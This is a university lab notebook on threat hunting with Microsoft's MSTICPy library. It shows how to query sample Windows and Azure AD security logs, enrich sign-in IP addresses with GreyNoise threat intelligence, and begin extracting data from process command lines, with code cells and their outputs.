UFCFFY-15-M Cyber Security Analytics

Practical Lab 3: Threat Hunting using MSTICPy (Microsoft Threat Intelligence Centre Python)


In this lab we will explore threat hunting using MSTICPy, a Python library developed by Microsoft for security threat intelligence work. The lab is based on the full lab provided by the MSTICPy team; here we focus on some core aspects only, plus an initial introduction to some of the machine learning capabilities. All credit to the MSTICPy team for providing this open-source library for community use.

Content:

  • 01: Data Acquisition
  • 02: Enrich Data
  • 03: Extracting key data
  • 04: Data Visualization
  • 05: Machine Learning using MSTICPy

Tip: You can either use the copy below to explore the MSTICPy library, or you can navigate directly to the GitHub page: https://github.com/microsoft/msticpy-lab. You may also choose to use their Binder instance, where all dependencies are pre-installed and available.

The purpose of this lab is to develop your awareness of the MSTICPy library and of the community-driven InfoSec Jupyterthon effort.


In [1]:
%%capture capt

### We need to install the following Python libraries
!pip install msticpy --user
!pip install msticnb --user

### We also need to clone the MSTICpy lab repository to acquire some further data that will be used in this lab
!git clone https://github.com/microsoft/msticpy-lab.git
In [14]:
from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals()
)

MSTICPYCONFIG = './msticpy-lab/msticpyconfig.yaml'
ti = TILookup()
TILookup.list_available_providers()
ti.reload_providers()
ti.provider_status

Starting Notebook initialization...


msticpy version installed: 1.6.1 latest published: 1.6.1
Latest version is installed.

Processing imports....
Imported: pd (pandas), IPython.get_ipython, IPython.display.display, IPython.display.HTML, IPython.display.Markdown, widgets (ipywidgets), pathlib.Path, plt (matplotlib.pyplot), matplotlib.MatplotlibDeprecationWarning, np (numpy), sns (seaborn), msticpy, msticpy.data.QueryProvider, msticpy.nbtools.foliummap.FoliumMap, msticpy.common.utility.md, msticpy.common.utility.md_warn, msticpy.common.wsconfig.WorkspaceConfig, msticpy.datamodel.pivot.Pivot, msticpy.datamodel.entities, msticpy.vis.mp_pandas_plot
Checking configuration....
No valid configuration for Microsoft Sentinel found.
Azure CLI credentials not detected. (see Caching credentials with Azure CLI)
Setting notebook options....


Notebook setup completed with some warnings.

One or more configuration items were missing or set incorrectly.

Please run the Getting Started Guide for Azure Sentinel ML Notebooks notebook. and the msticpy configuration guide.

This notebook may still run but with reduced functionality.

Notebook initialization complete


AzSTI
GreyNoise
OPR
OTX
Tor
VirusTotal
XForce
Settings reloaded. Use reload_providers to update settings for loaded providers.
Out[14]:
[]

01: Data Acquisition

The starting point for many security analysis notebooks is ingesting the data to be analysed or investigated. MSTICPy has a number of query providers that allow users to query and return data from a range of sources. Below we use the LocalData query provider to return data from local files. This suits this lab, and is also useful whenever analysis relies on local data rather than a 'live' data source.

To provide a common interface layer between data and features, MSTICPy returns all data as a pandas DataFrame. As well as giving other features a consistent format to use, this allows easy manipulation and analysis of the returned data using pandas' many features.

The first step in using a query provider is to initialize a QueryProvider and pass it the type of provider you want to use. Depending on the provider type you can also pass other required parameters. In the cell below we create a LocalData provider and pass it the location where our local data files and their definitions are stored.

Each provider contains a series of built-in queries. These are pre-defined queries that return a specific subset of data. For our LocalData provider each query returns a specific file, whereas for a 'live' data source such as Azure Sentinel the queries are executed against that data source and the results returned.

Once the query provider has been created we can use the browse_queries feature to interactively view the available queries.

In [4]:
# We start by loading a query provider for our `LocalData` source.
data_path = "./msticpy-lab/data"

qry_prov = QueryProvider(data_environment="LocalData", data_paths=[data_path], query_paths=[data_path])
# We can then look at the queries built into a provider by default
qry_prov.browse_queries()

Office 365 activity

Parameters


Query

exchange_admin.pkl

Example

{QueryProvider}[.QueryPath].QueryName(params...)

qry_prov.Azure.OfficeActivity(start=start, end=end, hostname=host)

Once a query has been selected you call it directly with qry_prov.{query_group}.{query_name}. You can also pass extra parameters to queries that have configurable elements (often things such as timeframes and specific entities to search for). In addition, query providers allow you to execute a query defined as a string by calling qry_prov.exec_query(QUERY_STRING).

The returned dataframe contains the query results and can be displayed and interacted with as with any other Pandas dataframe.

In [5]:
events = qry_prov.WindowsSecurity.list_host_events()
events.head()
Out[5]:
TenantId TimeGenerated SourceSystem Account AccountType Computer EventSourceName Channel Task Level EventData EventID Activity PartitionKey RowKey StorageAccount AzureDeploymentID AzureTableName AccessList AccessMask AccessReason AccountDomain AccountExpires AccountName AccountSessionIdentifier ... TargetUserSid TemplateContent TemplateDSObjectFQDN TemplateInternalName TemplateOID TemplateSchemaVersion TemplateVersion TokenElevationType TransmittedServices UserAccountControl UserParameters UserPrincipalName UserWorkstations VirtualAccount VendorIds Workstation WorkstationName SourceComputerId EventOriginId MG TimeCollected ManagementGroupName Type _ResourceId EventProperties
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:22.537 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13826 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4799 4799 - A security-enabled local group membership was enumerated ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 d0ec0118-9b6b-477e-ba9f-e4ead3665884 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Remote Desktop Users', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32...
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.827 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13826 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4799 4799 - A security-enabled local group membership was enumerated ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 5365f041-1345-4cd0-8fbb-41ccbaa16a39 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Administrators', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32-544',...
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.827 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 5333954d-9157-443c-9657-6ef390c73abb 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'MSTICAdmin', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-21-9...
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.833 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 d2fded8a-e507-4017-aedd-cb6da6a2b624 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'DefaultAccount', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-...
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.833 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 701504d1-e106-48ca-b424-d9ec20f17746 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Guest', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-21-996632...

5 rows × 226 columns

Lab Exercise 1

In the cell below write code that uses the query provider created above (`qry_prov`) to get data relating to security alerts using a built-in query. You can use the query browser above to find the most suitable query to run.
Hint: Queries relating to security alerts are part of the SecurityAlert query type.
In [6]:
# Get security alert data
query = qry_prov.SecurityAlert.list_alerts()
query.head(5)
Out[6]:
TenantId TimeGenerated AlertDisplayName AlertName Severity Description ProviderName VendorName VendorOriginalId SystemAlertId ResourceId SourceComputerId AlertType ConfidenceLevel ConfidenceScore IsIncident StartTimeUtc EndTimeUtc ProcessingEndTime RemediationSteps ExtendedProperties Entities SourceSystem WorkspaceSubscriptionId WorkspaceResourceGroup ExtendedLinks ProductName ProductComponentName AlertLink Type CompromisedEntity
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:29:07 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule b0e143b8-4fa8-47bc-8bc1-9780c8b75541 f1ce87ca-8863-4a66-a0bd-a4d3776a7c64 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:49:02 2019-02-18 02:19:02 2019-02-18 02:29:07 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 01:59:09 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 4f454388-02d3-4ace-98bf-3a7e4fdef361 3968ef4e-b322-48ca-b297-e984aff8888d CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:19:02 2019-02-18 01:49:02 2019-02-18 01:59:09 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "203.0.113.1",\r\n "Type": "ip",\r\n "Count"... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:29:07 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule b0e143b8-4fa8-47bc-8bc1-9780c8b75541 3a78a119-abe9-4b5e-9786-300ddcfd9530 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:49:02 2019-02-18 02:19:02 2019-02-18 02:29:07 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:43:27 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 3f27593a-db5b-4ef4-bdc5-f6ce1915f496 8f622935-1422-41e6-b8f6-9119e681645c CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:33:19 2019-02-18 02:33:19 2019-02-18 02:43:27 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 01:54:11 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 3cbe0028-14e8-43ad-8dc2-77c96d8bb015 64a2b4af-c3d7-422c-820b-7f1feb664222 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:14:02 2019-02-18 01:44:02 2019-02-18 01:54:11 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "203.0.113.1",\r\n "Type": "ip",\r\n "Count"... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert

02: Enrich Data

A key analysis step for security analysts is to take a dataset, extract relevant elements and enrich it with another dataset to help filter it. A common example of this is taking IP addresses in log data and seeing if any of them appear in threat intelligence data.

In the cells below we use MSTICPy's query provider to get sign-in event data, and then look up the IP addresses those sign-ins came from against a threat intelligence provider's API using the MSTICPy threat intelligence features. In this case we are using the GreyNoise provider.
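
The enrichment pattern described above can be sketched without any external service. The following is a minimal illustration using only the Python standard library. The log records, the `threat_intel` dictionary and the `enrich_logons` helper are hypothetical and are not part of MSTICPy; the IP addresses come from the reserved documentation ranges.

```python
# Hypothetical sign-in records (IPs are from reserved documentation ranges)
logons = [
    {"Account": "alice", "IpAddress": "192.0.2.10"},
    {"Account": "bob", "IpAddress": "198.51.100.7"},
    {"Account": "carol", "IpAddress": "192.0.2.10"},
]

# Hypothetical threat intelligence feed: indicator -> severity
threat_intel = {"192.0.2.10": "high"}


def enrich_logons(records, intel):
    """Return a copy of each record with a 'TISeverity' field added."""
    enriched = []
    for record in records:
        severity = intel.get(record["IpAddress"], "none")
        enriched.append({**record, "TISeverity": severity})
    return enriched


enriched_logons = enrich_logons(logons, threat_intel)

# Keep only the records whose source IP appears in the intelligence feed
suspicious = [r for r in enriched_logons if r["TISeverity"] != "none"]
for row in suspicious:
    print(row["Account"], row["IpAddress"], row["TISeverity"])
```

MSTICPy's TI lookup follows the same basic shape, except that the "feed" is a remote provider API and the result is returned as a DataFrame.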

In [7]:
# First we use a built-in query to get all of the sign-in data from our Windows host
data = qry_prov.WindowsSecurity.list_host_logons()
data.head()
Out[7]:
TenantId Account EventID TimeGenerated SourceComputerId Computer SubjectUserName SubjectDomainName SubjectUserSid TargetUserName TargetDomainName TargetUserSid TargetLogonId LogonProcessName LogonType AuthenticationPackageName Status IpAddress WorkstationName TimeCreatedUtc
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 NT AUTHORITY\SYSTEM 4624 2019-02-12 04:56:34.307 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 MSTICAlertsWin1$ WORKGROUP S-1-5-18 SYSTEM NT AUTHORITY S-1-5-18 0x3e7 Advapi 5 Negotiate - - 2019-02-12 04:56:34.307
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:37:25.340 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc90e957 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:37:25.340
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:37:27.997 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc90ea44 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:37:27.997
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:38:16.550 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc912d62 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:38:16.550
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:38:21.370 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc913737 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:38:21.370

MSTICPy includes a Threat Intelligence (TI) lookup provider, TILookup, that allows key indicators to be searched for in a range of services. It can be configured to use several different providers, and queries can be targeted at a specific provider if required. MSTICPy currently supports the following providers:

  • VirusTotal
  • AlienVault OTX
  • IBM XForce
  • GreyNoise
  • Azure Sentinel Threat Intelligence

The TI lookup provider also supports getting the Open Page Rank for a domain and determining whether an IP address is a Tor exit node.

When instantiating a TI provider you can define the providers you want it to load, or you can let it search for a MSTICPy config file and take configuration from there - this is the approach we are taking in this lab.
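
MSTICPy locates its configuration through the `MSTICPYCONFIG` environment variable, and otherwise looks for a `msticpyconfig.yaml` file in the current directory. Assigning a plain Python variable of the same name does not set the environment variable, so an empty provider list can mean that the file was never found. A minimal sketch, assuming the lab repository was cloned to `./msticpy-lab` as in the install cell (the `config_path` name is used only for illustration):

```python
import os
from pathlib import Path

# Assumed location of the lab's config file (from the earlier git clone)
config_path = Path("./msticpy-lab/msticpyconfig.yaml").resolve()

# msticpy reads the environment variable, not a Python variable
os.environ["MSTICPYCONFIG"] = str(config_path)

if not config_path.is_file():
    print(f"Warning: {config_path} not found; TI providers will not load")
```

Set the variable before creating `TILookup()`, or call `ti.reload_providers()` afterwards so that the settings are read again.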

In [12]:
# Next we need to load our TI providers
ti = TILookup()

.loaded_providers shows which providers have been loaded by the TI lookup provider.

In [13]:
# For this lab we are just using the GreyNoise provider
ti.loaded_providers
Out[13]:
ChainMap({}, {})

Once loaded you can use lookup_ioc to look up a single indicator, or lookup_iocs to look up every value in a dataframe column.

In this example we want to look up every IP address in our results dataframe, so we are going to use lookup_iocs, tell it to look up values in the "IpAddress" column, and use the GreyNoise service to do the lookups.

Once we have results you can either display the results statically or use browse_results to get an interactive view of the results.
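
Log columns often contain placeholders and repeats: the logon data above has `-` where no address was recorded, and the same address on many rows. Filtering the column down to distinct public addresses first may help when working with rate-limited services. The following standard-library sketch shows one way to prepare such a list; `unique_public_ips` is a hypothetical helper, not a MSTICPy function, and `10.0.1.7` is included only as an example of a private address.

```python
import ipaddress


def unique_public_ips(values):
    """Return distinct, globally routable IP addresses in first-seen order."""
    seen = set()
    result = []
    for value in values:
        try:
            addr = ipaddress.ip_address(str(value).strip())
        except ValueError:
            continue  # placeholders such as "-" are not valid addresses
        if not addr.is_global:
            continue  # skip private, loopback and other reserved ranges
        if addr.compressed not in seen:
            seen.add(addr.compressed)
            result.append(addr.compressed)
    return result


# Values like those in the IpAddress column, plus one private address
column_values = ["-", "131.107.147.209", "131.107.147.209", "10.0.1.7"]
print(unique_public_ips(column_values))
```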

In [97]:
# Here we lookup each of the IP addresses in our dataset
results = ti.lookup_iocs(data, obs_col="IpAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])

131.107.147.209

Type: 'ipv4', Provider: GreyNoise, severity: information

Details

Not found.

Reference:

https://api.greynoise.io/v3/community/131.107.147.209

Raw Results

Raw results from provider...
''

Lab Exercise 2

Now that you have seen how to return and enrich data, complete the code in the following two cells to get a list of Azure AD sign-in events and look up the origin IP addresses against threat intelligence.

Additional documentation on the threat intelligence provider can be found in the MSTICPy documentation.

Hint:
  • Remember to pass `obs_col="IPAddress"` to `lookup_iocs` to get lookups on the correct column
  • You can reuse the TI provider assigned to `ti` in the cells above
In [115]:
# Use the query provider qry_prov to get Azure signin data with the list_all_signins_geo query
query = qry_prov.Azure.list_all_signins_geo()
query.head()
Out[115]:
TenantId SourceSystem TimeGenerated ResourceId OperationName OperationVersion Category ResultType ResultSignature ResultDescription DurationMs CorrelationId Resource ResourceGroup ResourceProvider Identity Level Location AlternateSignInName AppDisplayName AppId AuthenticationDetails AuthenticationMethodsUsed AuthenticationProcessingDetails AuthenticationRequirement ... NetworkLocationDetails OriginalRequestId ProcessingTimeInMilliseconds RiskDetail RiskEventTypes RiskEventTypes_V2 RiskLevelAggregated RiskLevelDuringSignIn RiskState ResourceDisplayName ResourceIdentity ServicePrincipalId ServicePrincipalName Status TokenIssuerName TokenIssuerType UserAgent UserDisplayName UserId UserPrincipalName AADTenantId Type Result Latitude Longitude
0 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
1 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
2 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
3 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
4 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 05:35.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 bf124019-b325-4a4a-81ff-6c2823461620 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n }\r\n] singleFactorAuthentication ... [] 39f36cc7-ad3e-430c-bf78-bc96fbc33300 553 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safa... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 41.465630 -73.610718

5 rows × 62 columns

In [116]:
# Lookup the IP addresses in the IPAddress column using the GreyNoise TI provider
results = ti.lookup_iocs(query, obs_col="IPAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])

109.88.218.99

Type: 'ipv4', Provider: GreyNoise, severity: information

Details

Not found.

Reference:

https://api.greynoise.io/v3/community/109.88.218.99

Raw Results

Raw results from provider...
''

03: Extracting key data

When working with security-related data, the indicators you need are often not as readily available as they were in the example above. They may be encoded or otherwise obscured from human analysis. MSTICPy includes tooling to help security analysts quickly decode this data for further analysis.

In this section we are going to query our datasets for command line data, decode any Base64 encoding in the command lines using the base64 feature, and then extract known indicator types (such as IP addresses and domain names) from that data using the IoCExtract feature.

In [117]:
# Load command line data set
cmdl_data = qry_prov.WindowsSecurity.list_host_processes()
cmdl_data.head()
Out[117]:
TenantId Account EventID TimeGenerated Computer SubjectUserSid SubjectUserName SubjectDomainName SubjectLogonId NewProcessId NewProcessName TokenElevationType ProcessId CommandLine ParentProcessName TargetLogonId SourceComputerId TimeCreatedUtc
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:21 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0xd78 C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe %%1936 0x1994 "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df... C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 21:06.9
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:21 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x221c C:\Windows\System32\conhost.exe %%1936 0xd78 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 21:06.9
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 2:15 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x638 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon... %%1936 0xe24 "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF/DesiredStateCo... C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 15:36.3
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 2:15 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x115c C:\Windows\System32\conhost.exe %%1936 0x638 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon... 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 15:36.3
